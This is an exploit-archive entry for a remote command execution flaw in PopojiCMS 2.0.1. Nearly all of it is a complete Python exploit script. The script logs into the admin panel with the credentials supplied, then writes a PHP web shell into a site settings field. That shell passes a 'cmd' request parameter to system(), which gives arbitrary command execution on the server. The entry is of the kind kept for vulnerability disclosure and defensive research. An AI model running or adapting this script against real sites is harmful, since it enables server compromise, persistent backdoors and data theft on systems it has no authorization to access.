PopojiCMS 2.0.1 Remote Command Execution (RCE)

2024.06.17
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-78

# Exploit Title: PopojiCMS 2.0.1 - Remote Command Execution # Date: 14/04/2024 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://www.popojicms.org/ # Software Link: https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip # Version: Version : 2.0.1 # Tested on: https://www.softaculous.com/apps/cms/PopojiCMS import requests import time import sys def exploit(url, username, password): login_url = f"{url}/po-admin/route.php?mod=login&act=proclogin" login_data = {"username": username, "password": password} headers = {"Content-Type": "application/x-www-form-urlencoded", "Referer": f "{url}/po-admin/index.php"} session = requests.Session() login_response = session.post(login_url, data=login_data, headers=headers) if "Administrator PopojiCMS" in login_response.text: print("Login Successful!") time.sleep(1) # 1 saniye bekle else: print("Login Failed!") return edit_url = f"{url}/po-admin/route.php?mod=setting&act=metasocial" edit_data = {"meta_content": """<html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?> </pre> </body> </html>"""} edit_response = session.post(edit_url, data=edit_data, headers=headers) if "cmd" in edit_response.text: print("Your shell is ready:", url) time.sleep(1) else: print("Exploit Failed!") return if __name__ == "__main__": if len(sys.argv) != 4: print("Kullanım: python exploit.py sitename username password") sys.exit(1) url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] print("Exploiting...") time.sleep(1) print("Logging in...") time.sleep(1) exploit(url, username, password)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top